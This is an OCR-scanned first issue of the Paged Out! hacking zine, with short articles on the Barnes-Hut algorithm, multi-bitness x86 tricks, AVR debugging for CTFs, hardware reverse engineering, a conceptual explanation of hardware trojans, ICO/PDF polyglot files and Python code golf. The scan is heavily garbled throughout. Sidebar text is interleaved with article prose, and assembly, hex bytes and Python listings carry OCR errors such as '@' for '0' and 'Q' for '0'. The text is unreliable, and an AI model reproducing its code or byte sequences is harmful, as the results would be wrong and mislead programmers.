; E : - E. Paged Out! is what happens when a technical reviewer sees too 


| LI T | many 20-page long programming articles in a short period of 
ee |] Py time. Though that's only part of the story. The idea of an 
experimental zine focusing on very short articles spawned in my 
mind around a year ago and was slowly — almost unconsciously 


Paged Out! Institute — developing in my head until early 2019, when | finally decided 
https://pagedout institute/ that this whole thing might actually work (even given my chronic 
: ; lack of time). 
Project Lead Why short articles in the first place, you ask? They are faster to 
Gynvael Coldwind read, faster to write, faster to review, and it's fully acceptable to 
write a one-pager on this one cool trick you just used ina 
eVacitivonhecintant project / exploit. Furthermore, as is the case with various forms 
: ; of constraint programming and code golfing, | believe adding 
Arashi Coldwind some limitations might push one to conjure up interesting tricks 
while constructing the article (especially if the author has 
DTP Programmer almost full control of the article's layout) and also, hopefully, 


increase the knowledge-to-space ratio. 


foxtrot_charlie 


Giving authors freedom to arrange the layout as they please has 

DTP Advisor interesting consequences by itself. First of all, we can totally 

tusiak charlie dodge a standard DTP process - after all, we get PDFs that 

: already use the final layouts and can be merged into an issue 

- with just a set of scripts (therefore our Institute has a DTP 
Lead Reviewers Programmer instead of a DTP Artist). Secondly, well, every 

Mateusz "jOOru" Jurezyk article looks distinctly different — this is the reason | say our 

KrzaQ project is "experimental" — because nobody can predict 

whether this artistic chaos of a magazine will get accepted by 

: our technical community. And thirdly, merging PDFs is a pretty 

Reviewers interesting technical challenge by itself - and even though | fully 
kele believe in our DTP Programmer, | do realize it might take a few 


disconnectSd issues to get an optimal PDF. 


As for the variety of topics in our zine - programming, hacking, 
gamedev, electronics, OS internals, demoscene, radio, and so on, 
We would also like to thank: and so forth - what can | say, | just wrote down the areas | 
personally find fascinating, enchanting and delightful. 


Artist (cover) 


ReFiend(deviantart.com/refiend) To finish up, | would like to wish our readers an enjoyable 


experience with the first issue of the free Paged Out! zine. And in 
case you have any feedback, please don't hesitate to email 


Additional Art gynvael@pagedout institute. 
cgartists (cgartists.eu) Hagiein Basa 
Templates 
Matt Miller Gynvael Coldwind 

wiechu Project Lead 


Mariusz "oshogbo" Zaborski 


Legal Note 
Issue #1 Donators This zine is free! Feel free to share it around. © 
Mohamed Saher (halsten) Licenses for most articles allow anyone to record audio versions and post 
them online — it might make a cool podcast or be useful for the visually 
impaired. 
If you would like to mass-print some copies to give away, the print files are 
If you like Paged Out!, available on our website (in A4 and US Letter formats, 300 DPI). 
: : If you would like to sell printed copies, please contact the Institute. 
let ou friends know about it! When in legal doubt, check the given article's license or contact us. 
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Dearest neighbors, 


n 19th century America, there were books 
made specifically for the frontiersman who 
£ couldn’t carry a library. The idea was that 
~© if you were setting out to homestead in the 
wild blue yonder, one properly assembled book could 
teach you everything you needed to know that wasn’t 
told in the family bible. How to make ink from the 
green husks around walnuts, how to grow food from 
wild seeds, and how to build a shelter from scruffy little 
trees when there’s not yet time to fell hardwood. You 
might even learn to make medicines, though I’d caution 
against any recipes involving nightshade or mercury. 

Now that the 21st century and its newfangled ways 
are upon us, the fine folks at No Starch Press have seen 
fit to print the collected works of The International 
Journal of Proof of Concept or Get the Fuck Out—our 
first fourteen releases—in two classy tomes, bound in 
the finest faux leather, on over fifteen hundred pages 
of thin paper, with ribbons to keep your place while 
studying. You will see practical examples of how to 
write exploits for ancient and modern architectures, 
how to patch emulators to prototype hardware back- 
doors that would be beyond a hobbyist’s budget, and 
how to break bad cryptography. You will learn more 
about file formats than you ever believed possible, and 
a little about how to photograph microchips and circuit 
boards for reverse engineering. 

This fine collection was carefully indexed and cross- 
referenced, with twenty-four full color pages of Ange 
Albertini’s file format illustrations to help understand 
our polyglots. But above all else, beyond the nifty 
tricks and silly songs, these books exist to remind you 
what a clever engineer can build from a box of parts 
with a bit of free time. Not to show you what others 
have done, but to show you how they did it so that you 
can do the same. 


Your neighbor, 
Pastor Manul Laphroaig 
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Use discount code APATIROFPOC 
for 40% off of both volumes. 
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Algorithmics 


Accelerating simulations by clustering bodies using... 


Accelerating simulations by clustering 
bodies using the Barnes-Hut algorithm 


Simulating forces such as gravity is a demanding 
task, because of the interactions every object has with all 
the other objects. With n objects, there are n — 1 forces 
acting on each body, so all in all, there are n- (n — 1) 
forces acting. The Barnes-Hut algorithm can be used 
to approximate the forces that need to be calculated by 
clustering the objects, sacrificing accuracy. In order to 
take those clusters into effect, the algorithm takes the 
size of the individual clusters and their distance to the 
respective object into account. 
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Figure 1: A cluster of stars that is far enough away from a single 
star can be abstracted as a single point in space. 


ga! 


(1) 

The above equation describes how to cluster the ob- 
jects. If a body (s,) is far away from a small cluster 
(r >> d), @ gets very small and the cluster in which 
the body is located can be abstracted to a single point. 
0 <0 <1 is provided by the user as a threshold impact- 
ing the accuracy and the speed of the simulation. Its 
value should be tuned in depending on the given data, 
as it decides which stars are approximated as a single 
cluster. 

Everything is based on the stars being in a tree, so 
we need to subdivide the space into cells. Such a subdi- 
vision can be seen in Figure 2a and the process can be 
seen on the bottom of this page. 

When calculating the forces affecting the object F' in 
Figure 2a, the Barnes-Hut algorithm does not consider 
all objects indvidually, but only the ones that fall over 
the threshold 6. For the object F’, this means that the 
Objects B and C are not calculated independently, but 
as a single object (a new abstract object is created in 
the center of gravity of B and C). 
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We insert the Star A 


O 


We start with an empty space 


https://github.com/hanemile 
https://twitter.com/hanemile 
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(a) Cell representation 


(b) Tree representation 


Figure 2: Visual representations of the same Barnes-Hut tree. 
(http: //arborjs.org/docs/barnes-hut) 


The tree in Figure 2b describes the cells from Figure 
2a - top left, top right, bottom left and bottom right are 
depicted as a new layer in the tree accordingly. While 
building the tree, we are going to store the center of grav- 
ity and the total mass of each inner node. The complete 
process of simulating the force acting on a single star 
works in the following way: 

We walk through the tree starting from the root in 
the direction of the leaves, using a < @ as the end condi- 
tion. We use @ as a threshold for controlling how many 
forces to take into account (0 < 6 < 1). The force acting 
on a star is calculated when a leaf is reached or when an 
end-condition is met (thus resulting in no further recur- 
sion into the tree from that node on). 

Experimenting with the value of @ on the dataset 
can optimize the runtime from O(n”) to as low as 
O(n-log(n)). This means that if we’ve got 2-10°® bodies 
and can calculate the forces acting on 10® bodies per sec- 
ond, the total runtime is reduced from about 1200 Years 
down to 45 minutes optimally (the time to build the tree 
is an actual computational complexity (O(n - log(n))), 
not a measured runtime and does not depend on @ ). 

This principle can also be applied to other types of 
problems such as simulating molecules. If you come to 
do something with it, don’t mind writing to me! 


@hanemile on most platforms. 


Inserting B: Subdivide, shift A, Inserting C: Subdivide, shift A, 
shift B from root shift C from root 
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Multi-bitness x86 code 


I first needed a trick of this kind nearly 20 years ago, 
when I was working on a variant of unreal mode that 
allowed for 32-bit code segments. I wanted a common 
interrupt table that would not need rewriting back and 
forth, so my interrupt handlers had to detect if CS was 
a 32-bit segment and in that case switch back to regular 
real mode before calling the original vector (a 16-bit 
BIOS or DOS service). The snippet I used looked like: 


hex use16 use32 
3D 77 77 cmp ax, 7777h cmp eax, 
EB ?? jmp already16bit 


I thought this was a fun solution, but then I found out 
that it was actually possible to move IDT base in real 
mode, what made this trick obsolete. 


Not long after, I was learning of the then-upcoming 
x86-64 architecture (an official name at the time) and 
I noticed that 32-bit instructions were mostly encoded 
the same in the new mode. Only things like addresses 
and stack elements were promoted to 64-bit auto- 
matically, other sizes stayed as they were unless a REX 
prefix was used. It stirred my imagination and made me 


hex use32 

56 push esi 
convert: 

66 AD lods word [esi] 

66 85 CO test ax, ax 

74 @E jz done 

66 83 F8 2F cmp ax,'/' 

75 F3 jne convert 

66 C7 46 FE SC 00 mov word [esi-2],'\' 

EB EB jmp convert 
done: 

SE pop esi 


I never really needed a variant of my trick that would 
distinguish 64-bit mode from 32-bit one. But years later 
I learned that there are sightings of similar contrivances 
in the wild, even if made for purposes much different 
than mine. It made me think about upgrading my own 
snippet. 


I came up with this one: 


hex use64 use32 
67 8D @6 lea eax, [esi | lea eax, 
EB ?? jmp is64bit 


Modern processors also got a new opcode that enables 
a completely transparent variant: 


hex use64 use32 
67 @F 1F @6 nop [esi] nop 
EB ?? jmp is64bit 


It might even be made into a three-way switch, for an 
unlikely occurrence that the code might get executed in 
16-bit mode: 


hex use64 
67 QF 1F @6 nop [esi] 
EB ?? jmp short not32bit 

; 82-bit mode detected... 

not32bit: 
OF 1F Q6 nop [rsi] 
EB ?? jmp short is64bit 

; 16-bit mode detected... 

is64bit: 

; 64-bit mode detected... 
hex use16 use32 
48 dec ax dec 
B8 EB ?? mov ax ,Q??EBh mov 
EB ?? jmp ist6bit 
EB ?? jmp is32bit jmp 
EB ?? jmp unreachable jmp 


Tomasz Grysztar 
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[word @??EBh] 


Multi-bitness x86 code 


Tomasz Grysztar 
tgrysztar@flatassembler.net 


When an interrupt happens, the flags 
get stored on the stack, so it was not 
a big deal that CMP altered a few of 
them. 


Q??EBT7777h 


believe that perhaps some of existing machine code could 
run correctly in 64-bit segment without any alterations. 
Later I realized that many small obstacles made it not 
really viable in general, though certainly possible for 
some small snippets, like this one that converts slashes 
to backslashes in a UCS-2/UTF-16 string at ESI/RSI: 


use64 

push rsi 
convert: 

lods word [rsi] 

test ax,ax 

jz done 

cmp ax, 7” 

jne convert 

mov word [rsi-2],'\' 

jmp convert 
done: 

pop rsi 


In 64-bit mode a CMP instruction is 
still 32-bit by default, so I could not 
simply reuse the old method. 


This one does not touch any flags, but 
trashes EAX. It can be changed to use 
another register, but it always needs 
to sacrifice one. 


[word @??EBh] 


The operand of this instruction is 
decoded but nothing more is done 
with it. The address does not have to 
be valid. 


Why would you ever need to tell 
16-bit mode from 64-bit one? I don't 
know! 


As a bonus, here comes another three-way detector that 
simply does not care about preserving flags or registers. 
What makes it interesting is perhaps that its intent is 
obscured when only looking at 64-bit disassembly. But 
after reading this you might not get fooled anymore! 


use64 
eax mov 


eax ,@??7EB??EBh 


rax ,@??7EB??EB??EB? ?EBh 


The extra copies of OEBh that never 
get executed serve no real purpose, 
they just complete a nice pattern. 


is32bit 
unreachable 


DE De i yao. COG aziat 
https://flatassembler.net 


Output/messages 
Assembly 
©x0000007a ? Idi 
ldi 
ldi 
rjmp 


0x00 
0x0000007a 


Stack 
[0] from 0x0000007a 


Threads 
[1] id -1 from 0x0000007a 


Qx0000007a in ?? 


AVR debug env for CTF 
and profit? Nah... 


| recently came across some CTF challenges based on 
Arduino/ATmega bin/Intel HEX. | lost some time in 
setting up a debug environment, so I'd like to share here 
my quick installation guide. 


1) | don't have a board... damn... OK, I'll go with 


software 

If you don't have a board with a JTAG or similar interface, 
the easiest way is to go with software: 
https://github.com/buserror/simavr 


Quick installation guide: 
(requires avr-gcc, avr-libc, freeglut3-dev) 


# git clone https://github.com/buserror/simavr 
# cd simavr 
# make 


The only trick here is how to run it: 


#./examples/board_simduino/obj-x86_64-linux-gnu/simduino.elf -d 
<path_to_hex_file> 


Now you have a sketch file started and waiting on 
instruction address 0, with a GDB port (port 1234). 


2) OK, and now? How can | attach a debugger? 


You need to use an avr-gdb debugger. The problem is 
that with most of the distros, this is not coming with 
Python support enabled, so you can’t have a decent 
interface. 

| used Dashboard: https://github.com/cyrus-and/gdb- 
dashboard). See screen on top. 


To get a working copy with Python extension | grabbed 
the scripts at: 
https://github.com/igormiktor/build-avr-gcc 

then modified the script build-avr-gdb. 


https://github.com/cecio/ 


AVR debug env for CTF and profit? Nah... 


Modify line: 

../$NAME_GDB/configure --prefix=$PREFIX -target=avr 

Add Python support: 

../$NAME_GDB/configure --prefix=$PREFIX --with-python -target=avr 


Then run the script: it should automate most of the 
things for you. At the end, if you installed the Dashboard 
GDB interface, you'll have your shiny debugger ready to 
be used in: 


/usr/local/avr/bin/avr-gdb 


Remember to review the log file in case of errors: for 
example | missed a “missing package” for “texinfo” the 
first time. 


3) but... but... GDB behaves in a strange way... 


So, quick cheat sheet for the avr-gdb. To connect to the 
running simavr: 


(gdb) target remote localhost:1234 


Remember that the program is stopped, so if you want 


un 


to run it, just type “c” to continue. 


To review the memory allocation: 
(gdb) info mem 


You usually see that the FLASH is allocated at 
0x00000000 and the SRAM at 0x00800000. Here a tricky 
part: if you set a breakpoint the usual way (with 
command b *0x00000101), it will be placed in SRAM... so 
not very useful. If you want to place it in FLASH, you 
have to use the following syntax: 


(gdb) b *(void(*)()) 0x00000101 


OK, so you are ready to debug and find your next flag... 


SE-37 Cesare “redSheep" Pizzi 
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happy hacking! 


chubby75 
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Ever needed a cheap FPGA board to just throw into a 
project somewhere? Are you bothered by the fact that the 
most GPIO you usually get is a measly Arduino header? 
Look no further! 

Chubby75 is an effort to reverse engineer an LED panel 
controller board (identified RV9O0IT, available on 
Aliexpress for around $20), that just happens to contain: 

- a Spartan 6 LX15 FPGA 

- 2x Gigabit Ethernet with PHYs As 

- 8MBytes of SDRAM 
- over 70 5V GPIOs 


We provide extensive documentation to turn this board 
into an FPGA development board for education and 
research. And, given enough effort, you might even be able 
to write a proper open source stack for controlling LED 
panels! 

We also provide support for Migen/MiSoC/LiteX, so you 
can define your digital logic in Python. To blink an LED 
run the following Python code in the Chubby75 git 
checkout: 


from migen import * 
class Top(Module): 
def _ init__(self, platform): 
# Single clock domain from external 
# oscillator. 
osc = platform.request('clk25') 
self.clock_domains.cd_sys = \ 
ClockDomain( ) 
self.comb += self.cd_sys.clk.eq(osc) 
# Blink that LED. 
led = platform.request('user_led') 
counter = Signal(max=25000000 ) 
self.sync += \ 
If(counter == 0, 
counter .eq(25000000), 
led.eq(~led), 
) .Else( 
counter.eq(counter-1) ) 


) 


# Instantiate and build for RV901T. 

from platform import Platform 

p = Platform() 

t = Top(p) 

p.build(t) 

# Program over JTAG with xc3sprog and a 

# Xilinx Platform Cable. 

import migen.build.xilinx.programmer \ 
as prgs 

prog = prgs.XC3SProg('xpc') 

prog.load_bitstream('build/top.bit') 


Don't forget! Using LiteX allows you to quickly integrate 
support for Ethernet (via LiteEth), and SDRAM (via 
LiteDRAM). And, if you want a soft core, this FPGA will 
easily fit a Lattice LM32 and a bunch of picorv32 RISC-V 
cores! In the repository, you'll find a working example of 
SDRAM + LM32 running C code. 

Right now you will still need Xilinx's ISE suite to develop 
for this board. However, there are efforts to bring an open 
source toolchain to Spartan 6 FPGAs, so keep your eyes 
peeled! 


q3k 
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github.com/q3k/chubby75 nae old 
repository licensed under CC-0 us bor. 

ye controller 
into an FPGA 


devboard! 


You might be wondering - how do you document a 4 layer 
PCB and get a full pinout of all the connectors? 


We started by finding JTAG on the board. Thankfully, it's 
marked on the silkscreen, so we just had to scrape the 
soldermask off and solder to it. With that, we could start 
running our own bitstreams on the board. But how do we 
even know where a clock or an LED is? 


We ended up taking a brute force approach. One board 
was fully depopulated, sanded, and photos were taken of 
every layer. This allowed us to understand some things 
about how the PHYs and SDRAM are connected, and how 
to control the I/O buffers on the board. We post processed 

the photos of the layers in GIMP and then layered them in 
Inkscape, so that we could trace and label things as we 
discovered them. 


SB: 


o 
© 
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Once we had a general idea of how things worked, we wrote 
a little piece of Migen code to take all unknown pads of the 
FPGA and make them output their identifier as a repeated 
ASCII string via UART. Using this, we could just probe the 
two large connectors on board with a USB to UART adapter 
to immediately know what pin of the FPGA drove what pin 
of the connector. 


Chubby75 is a collaboration brought to you by: 


Niklas Fauth, Jan Henrik, q3k, carrotIndustries, 
enjoydigital, jeanthom, informatic and many others. 


twitter.com/q3k 


HACKULELE 


Because all things got to be smart, China gifted us with a 
Smart-Ukulele called Populele. 


The point is to use a bloated, kind of ugly app to connect 
to your uke over bluetooth, sending commands to blink 
the lights behind the frets. The app gamifies the learning 
process, has songbooks and stuff, but as all “smart” things 
go, everyone on the App’s page complains about unreli- 
able BT connection, bugs, etc. 


CLOSER LOOK AT THE SMART 


The “smart” part is easy to pull off from inside the instru- 
ment and reveals a boardy board, a lipo-y lipo, and cabley 
cables to connect to the blinky blink side. 


3. 3V 
® BAT 
RX 
TX 


SGKJ-UKP-V04 


Main chip there is aDialog DA14580. Unfortunately, 

according to my logic analyzer, both TX/RX (for serial) 

& SDIO/SCK (for JTAG) aren’t active: no easy hacking for 
e :'(1 couldn’t get any intel on the tiny thing on the side 

that’s marked 5F2 A71 TOG. 


BLE SNIFFING 


| use the NRF52 devKit by Nordic to sniff the BLE traffic. 
The output is verbose, the uke sends multiple heartbeats 
per second, for some reason, probably to drain the battery 
faster. 


The Uke’s LED matrix state is set by a 19 bytes packet 
sent to a GATT service (attribute handle 0x0024, UUID is 
0000DC8600001000800000805F9B34FB). 3 bytes per 
string (G, C, E and A) are sent to set 18 LEDs (only the 18 
MSB are used) as So: 


F1 AA AA AA EE EE EE CC CC CC GG GG GG 00 00 
00 00 00 00 


The bluez. py script will let you send these packets 
through BlueZ. 


https://github.com/furikuda/hackulele 


Hackulele 


INSIDE THE FRETBOARD 


Hooking up your logic analyzer on SDA/SCL you get a 
“3 of the IC commands sent at boot time to the 
IS31FL3731 chip (address 0x74). 


No idea why the chip sends all these 0x08 


fe commands, as they are nowhere in the 
74 FD OB 1S31 doc, trying to fix weird timing issues 
74 08 maybe? Or just sloppy coding? 
74 0A 00 
74 08 | just ignored and wrote a CircuitPython 
EeleD lg) lib to talk to the LED matrix (main. py). 
74 08 : : 
7h. 00 FF The annoying part was finding what LED 
74 08 address corresponded to where on the 
74 02 FF fretboard. 
74. 08 
74 04 FF To connect to the LED matrix, pull SCL & 
is ee = SDA up with a 4.7K resistor, 
74. 08 ground INT, and set SDB asa 
74 08 FF ‘enable’ pin. The 5V VCC will 
7% 08 need more than 50mA, so 
74. OA FF , : 
74 08 don’t use an arduino GPIO. 
74. OC FF 
74. 08 
) 
ae FEMALE/UKE SIDE 
74. 08 — — 
74. 08 | || | | | 
74.90 55 
oh he | 5V GND SCL 
74. 08 
es | SDB. INT SDA | 
74. 08 | | 
74. 08 
74.92 55 
74 08 
age You now get full control of the 
7k. 9355 LEDs PWM and super fast anima- 
tion update without the painful 
BLE setup. 
ANIMATIONS! 


The library on the repo uses separate 
‘Animator’ objects to update the 
internal LED state. 

by the Best Badge Ever 

(2018 DCFurs badge). 

Both the CircuitPython main. py 


and BlueZ bluez.py scripts use 
the same Animator objects. 


It is heavily influenced 


See animations/scroll.py 
for an example. 


MORE INFO 


Link to repo with more 
info, resources and docs: 
https://github.com/ 
Furikuda/hackulele 


You'll learn about the infamous 
“Page Night” (that comes after the 
8" page, and has the 0xOB identifier), 
and some ideas for more research. 


Jokull Barkson 
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w0Ozek ['vuzek], 


the motorized shopping cart 


ingredients: 
- one shopping cart 
(gynvael wanted me to 
mention that you can buy 
one legally on ebay) 
- one hoverboard 
steps: 
1) disassemble hoverboard 
2) cut out hub motor brackets 
from chassis with bandsaw 
3) (optionally) square down 
the brackets ona mill 
4) remove front wheels from 
cart 
5) cut down a 50mm flat bar to length 
and attach it to the front wheel 
mounts (likely with M12 bolts) 
6) drill 8mm holes in bar and attach 
hoverboard motor brackets 
7) mount a metal box on the bottom of the cart basket with zip-ties 
or another low-tech solution 
8) mount controller and battery in box 
9) fasten hub motors to brackets, run cables to control box (use 3- 
way electrical wiring for BLDC phases, CAT5 for hall sensors) 
10) flash the controller board with 
github.com/niklasfauth/hoverboard-firmware-hack 
11) attach controller to a thinkpad via UART and write python code 
that sends control packets 
12) wear a helmet 
13) try not to kill yourself 


see https://wiki.hackerspace..pl/projects:wO0Ozek 
for more info, test drive footage and some control firmware code 


q3k twitter.com/q3k 
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Like a lot of people, you probably have or had a Wii, and like most people you like Guitar Hero, so you may 
have somewhere in your house an old Guitar Hero game and the quitar-shaped controller collecting dust. 

IF you have one, this article is made for you! 

In this article, I'l explain how | hacked an old Guitar Hero controller in order to transform it into a minimalist 
musical instrument. 

For that, we just need a Guitar Hero controller (thanks captain obvious), an Arduino Uno, some wires, a 
potentiometer, an electrodynamic loudspeaker, a resistor of 250 ohms and an NPN transistor (I ‘used a 58050 
D-331 for this project). 


Before the fun part, there is a little bit of theory. 

Normally, our guitar is connected to a Wiimote (the principal Wii controller). Almost all Wimote's accessories 
are controlled thanks to an l2C bus. 

An Inter-Integrated Circuit (l2C) bus allows to transmit data between two components thanks to only 2 wires: 
the SDA wire for the data signal (to transport data) and the SCL wire for the clock signal (to synchronize). 


Sooooo basically, we just have to get the states of the controller's buttons and play different notes 
depending on the button pressed. 

With an Arduino (as a master), we can easily communicate through an l2C bus with the controller (which acts 
as a slave, at the 7-bit address 0x52), for example this is a piece of code which begins the communication: 


Wire.begin(); | For this project, | wrote my own library to communicate 
Wire. beginTransmission(0x52); | with the guitar. 

Wire.write(0x40) ; | All the sources of this project are available here: 
Wire.write(0x00); | https://github.com/SOiden/Real Life GuitarHero 
Wire.endTransmission(); | Play with it as you wish it. = 


To know the function of each wire on the controller's connector, | had to desolder it and | found this 


correspondence: 
[ WIRE | FUNCTION | PIN TO CONNECT ON ARDUINO ] 
[ BROWN | SDA | A4 ] 
[ RED | GROUND | GND ] 
[ WHITE(1) | SCL | AS ] 
[ WHITE(2) | POWER | 3V3 ] 
(1): near the red wire (2): near the blue wire 


The guitar is now connected to the arduino: To finish, you just need to add a potentiometer to control the 
sound power, and electrodynamic speaker to emit music notes. 

The music notes are generated by the tone function, called like that tone(8, note x(k], 250); where 8 is the 
pin where the speaker is connected, note x(k] is the note played (x is an A, B, D, € or G the notes emitted by 
the guitar strings) with the octave k (modifiable by pressing the + and - buttons) and 250 is the duration 
(250 ms). 

Just follow the scheme below (made with fritzing) and you should obtain something like that: 


$01den@protonmail.com SOiden 


https://github.com/SO1den eco 


Hardware Trojans Explained 


Hardware 
Trojans 
EXPLAINED! 


In four simple examples! 


Hardware trojans are hidden from user features of a 
hardware component which can add, remove or 
modify the functionality of electronic element, 
thereby reducing its reliability or creating a 
potential threat. HW trojan consists of two building 
blocks: trigger and payload. Payload is a malicious 
modification of the circuit that changes the signal 
values. Trigger decides when to activate the 
payload. 

So take a look at the figure on the left - the simplest 
- nots circuit ever — traditional NOT 
gate (aka. inverter) that just 

negates the value of the input 
signal. 

In such configuration, the attacker can only have 

one goal - to change the value of the ‘s’ signal. 

However, he has a wide range of tools and methods 

at his disposal. So let’s start with the simplest 

approach: 


In this scenario, the value of the AND gate 
(payload) changes the value of the ‘s’ 
depending on the values of the ‘p & ‘q 
signals (trigger) that can be generated at any 
moment of the circuit work. Who decides about the 
‘p & ‘q’ values? These signals can be derived from 


signal 


other system components (e.g. sensors) or some 
external events (e.g. network monitor). In fact, you 
may even use the same signals that generate the 
original ‘s’ input. Just take a look at the next figure: 


Adam Kostrzewa 
SAA-ALL 0.0.5 


Such HW trojans are called combinationally 
triggered. But there are also other options available! 
The attacker can control when an attack will take 
place. This can be done by using a system clock or 
by counting incidents of selected operations. 


Trigger 


Such trojans, which are activated by a sequence of 
operations (in time) or after a period of time are 
called sequentially triggered. Finally, nobody 
prevents you from using both methods at once i.e. 


hybrid approach: 
Trigger 


Real Story: Even simple modifications, as already 
discussed, can be used to attack crypto engines. 
Below a schematic representation of the attack: 


Encrypted 


Plain Data In Data Out 
Crypto 
——»> —, 


Original Compromised 
key "ZI ' key (e.g. known bits) 


According to declassified documents from 2015, 
Crypto AG (Swiss manufacturer of cryptographic 
hardware), in cooperation with NSA, has 
introduced compromised HW to some of its 
customers. The complete list is still classified, but 
it is known that HW was used to spy on Iran and 
Libya, for example. Modifications were made in 
the form of hardware trojans / backdoors, which 
weaken the cryptographic protection at the 
request of the authority (as shown in the above 
figure). For many years, history was discredited as 
a conspiracy theory. 

More : https://en.wikipedia.org/wiki/Crypto_AG 


As you see it is not that difficult! Indeed, you may 

create some of these circuits “at home” (even using 
discrete elements) and later apply them to existing 
products - of course for fun and profit! ;) 


https://adamkostrzewa.github.io/ 


https://twitter.com/systemWbudowany 


A guide to ICO/PDF 
polyglot files 


In this article we are going to demonstrate how to 
create a polyglot file that is a valid ICO image as well 
as a valid PDF document. 

These two file formats have a couple of interesting 
properties that make this endeavour possible. 

ICO is a container format for files that can contain one 
or more BMP or PNG images. An ICO file is defined 
by a 6 byte header that contains some magic bytes and 
the number of images in the file. This is followed by a 
16 byte header each for every one of the images which 
among other data contains the offset and size of the 
actual image data. 

While it is common practice to have the image data 
start immediately after the headers this is not strictly 
required. Any data that is not located inside one of the 
image data areas specified in the header is ignored. 

The PDF file format is specified in ISO 32000. This 
specifications requires PDF files to start with the magic 
byte sequence %PDF. This requirements collides with 
the ICO header. Fortunately practically all PDF libraries 
and applications implement the Adobe supplement to the 
ISO 82000 which only requires the magic bytes to be 
present in the first 1024 bytes of a document. This 
gives us enough room to fit a ICO header with up to 63 
sub-images before the PDF data. 

Additionally there are several ways to include non- 
visible binary data in a PDF file. This is where we are 
going to put our image data. In this particular example 
the data will be placed into stream objects which have 
the following format: 


A guide to ICO/PDF polyglot files 


As long as the source file contains less than 64 images 
we are at this point still comfortably within the first 
1024 bytes of the output file and can simply append the 
bulk of our PDF file up to and including its last stream 
object. 


outfile.write(pdf.read(OFFSETLASTSTREAM) 


After this we extract the image data from our input 
ICO and append them as additional stream objects with 
suitable, unique object ids. 


OBJSTREAM_HEAD = ”””{} 0 obj << 
/Length {} 
>> 
stream 
OBJSTREAM_-TAIL = ”””endstream 
endobj 
for i in ico_data: 
outfile.write(OBJSTREAM_HEAD.format( 
obj-_id, i[0]).encode(’utf—8’)) 
icofile.seek(i[1], 0) 
ico_offsets.append(outfile.tell()) 
outfile.write(icofile.read (i[0])) 
outfile.write( 
OBJSTREAM_TAIL.encode(’utf—8’) 


objid += 1 


At the end of the output file we can then simply append 
the rest of our source PDF. 


pdffile.seek(OFFSETLASTSTREAM, 0) 
outfile.write(pdffile.read()) 


OBJECT ID 0 obj 

<< 

/Length LENGTH_OF_DATA 
aS 

stream 

IMG_DATA 

endstream 

endobj 


The last thing that remains to do now is to fix the 
offsets of the image chunks in the ICO header. Since we 
saved the offsets when appending them to our output 
file this is easily accomplished. 


ico_offsets.append (outfile.tell()) 

outfile.seek(18, 0) 

for i in ico_offsets: 
outfile.write(struct.pack(’<I’, i)) 
outfile.seek(12, 1) 


Where OBJECT_ID is an unique numerical id, 
LENGTH_OF_DATA is the number of bytes of data 
in the stream and IMG_DATA will be our image data. 

Armed with this knowledge about the file formats and 
an idea how to interleave them we can start to create a 
file that is a valid ICO as well as a valid PDF from two 
existing files. 

First we need to determine the number of images in 
the ICO file from bytes 5 and 6 of its header so we can 
copy all the headers to our output file. 


img_count = struct.unpack( 
*<HHH’, icofile.read(6)) [2] 

icofile.seek(0, 0) 

outfile.write(icofile.read(6)) 

for i in range(img_count): 
outfile.write(icofile.read(16)) 


https://twitter.com/tickelton 
https://tickelton.gitlab.io/ 


Now we are in possession of a ICO-PDF polyglot file 
that we can put to good use by e.g.: 


e embedding a CV/job posting into the favicon of our 
website to challenge recruiters/job seekers 


e putting a manual for its easter eggs into the desktop 
icon of our application 


A Python implementation of the process described 
above including example data and ready made polyglot 
files can be fount at https://github.com/tickelton/ico- 
pdf. 


Structuring the PDF data in a way that the images 
are embedded not as raw streams but as attachments 
that are also visible in the PDF document is left as an 
exercise to the reader. 


tick 
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PNG Themed Python Code Golf 


PNG Themed Python Code Golf 


0x00 INTRODUCTION 


Back in May 2019, Gynvael Coldwind organized a code 
golf competition®°° where you could win a ticket For 
CONFidence™®"', an international IT security conference. 
Actually, there were 3 competitions For 3 technologies: 
C++, JavaScript and Python 3, but I'll Focus on the last 
one. The goal was to write a program that generates 
a valid PNG File named confidence. png with pixel val- 
ues exactly matching a specified model image. Entries 
were run on an offline, o install of Ubuntu Server 
19.04 using python lence.py command. Also 
there was a 60 seconds ecinen time limit. Darn! No 
brute-Forcing. The smallest confidence.py file wins! 
Accidentally, I've managed to win®*°? with a 1133 bytes 
solution but let's do better! Shall we? 


0x01 THE IMAGE 
The model image”? was a 11746 bytes sized file: 


The First step is to make the image as small as possi- 
ble while preserving pixel values. After a quick anal- 
ysis: it’s completely opaque and uses only 8 unique 
colors. The PNG File contains some metadata we can 
strip. Also you might notice that the image is made of 
solid 20 x 20 pixel blocks. You can scale it up and down 
by Factor of 20 losslessly (using no interpolation). Sadly, 
the default Python 3 installation doesn’t include any im- 
age processing library, so let’s abandon this approach. 
Using GIMP to remove metadata, alpha channel and 
to convert the image to indexed mode gets us a 4283 
bytes PNG file! Then we can use a PNG optimizer like 


optipng or pngcrush to get as Ws as cea bytes, but 


overkill, l oe That oat us as low as 2428 3 bytes! For 
some web browsers and other apps, first 2408 bytes 
would be enough to display such a damaged PNG File. 
But since we need a correct PNG file, we probably can’t 
get below 2428 bytes while preserving pixel values. 
Prove me wrong :) 


0x00 https://gynvael.coldwind.pl/?id=710 

9x01 https://confidence-conference.org/2019/krakow.html 

0x02 https://gynvael.coldwind.pl/?id=7 11 

0x03 https://gynvael.coldwind.pl/img/confidence_2019_golf.png 
0x04https://github.com/google/zopfli 


blamedrop 


Public Domain 


0x02 THE SCRIPT 

So far, we've OP- ~ Method Bytes 
ee ie PNG bz2.compress 950 
— sal ee Llzma.compress 768 
could. Now, wi at gzip.compress 732 
about squeezing Zlib. compress 722 
it up evel Further zlib.compress (level=9) 720 
by applying gen- ~opFit --deflate 710 


eral purpose com- 
pression? We could use Python’s methods, but zopfli 
wins again with raw deflate stream. To decompress it in 
Python we need to use zlib. decompress with wbits=-8 
as additional argument. Now, what about putting these 
710 bytes of binary data into a Python script? We would 
need a whole 2009 


Method len() len(repr()) bvbauy ‘ 
b64encode 948 951 P ree ne Gamssen 
it as a bytes literal. 
a85encode 888 915 First th HE Eh 
b85encode 888 891 he oud = 


Base64! But wait! 
The base64 module also supports Base85 encoding. 
With larger character set it is more efficient. It is a 
code golf after all, every byte counts! Putting this all 
together gives... 


import zlib,base64 as b;open('confidence.png','wb'). 
write(zlib.decompress(b.b85decode( '>kRO7=jD>(Vqjq4_4 
